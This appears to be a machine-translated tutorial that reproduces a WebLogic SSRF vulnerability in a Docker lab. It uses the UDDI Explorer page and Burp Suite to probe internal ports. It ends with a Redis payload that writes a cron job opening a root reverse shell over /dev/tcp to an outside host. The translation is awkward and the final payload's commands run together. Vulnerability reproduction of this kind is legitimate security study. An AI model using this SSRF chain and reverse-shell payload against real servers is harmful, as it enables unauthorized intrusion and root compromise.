How to realize the recurrence of Weblogic SSRF vulnerability

<p>First, use docker to build an environment docker installation and build an environment tutorial: https://www.freebuf.com/sectool/252257.html</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20231222/xhjezogzqzy1647.jpg"/></p><p>Access port 7001</p><p>&nbsp; <img src="https://freeonlinedomain.com/uploads/allimg/Server/20231222/4alh41gbm4r1648.jpg"/></p><p>Second, the vulnerability reappearance step 1. Vulnerability page/UDDI Explorer/SearchPublicRegistries.jsp<img src="https://freeonlinedomain.com/uploads/allimg/Server/20231222/m2y0oauigrc1649.jpg"/></p><p>2. Check out IBM and see <img src="https://freeonlinedomain.com/uploads/allimg/Server/20231222/l1gf0hycdxt1650.jpg"/></p><p>It is found to be a connection, so there may be ssrf.</p><p>3. Grab the bag with burp suite and click Search <img src="https://freeonlinedomain.com/uploads/allimg/Server/20231222/mezndofyrwd1651.jpg"/></p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20231222/s3tygoep0oo1652.jpg"/></p><p>4. Modify the connection of the operator parameter <img src="https://freeonlinedomain.com/uploads/allimg/Server/20231222/51urk3p2ms31653.jpg"/></p><p>5. The access result visits a nonexistent port and returns could not connect over HTTP.</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20231222/ojbhl4r1oie1654.jpg"/></p><p>Access to an existing port returns a status code.</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20231222/yrgkoiehljs1655.jpg"/></p><p>Access intranet</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20231222/uh3y3xydhv31656.jpg"/></p><p>Rebound shell&#39;s payloadset 1 &quot;with redis. * * * * * root bash -i &gt;&amp; /dev/tcp/192.168.220.151/1234 0&gt;&amp;1 &quot;config set dir /etc/config set dbfilename crontabsave</p>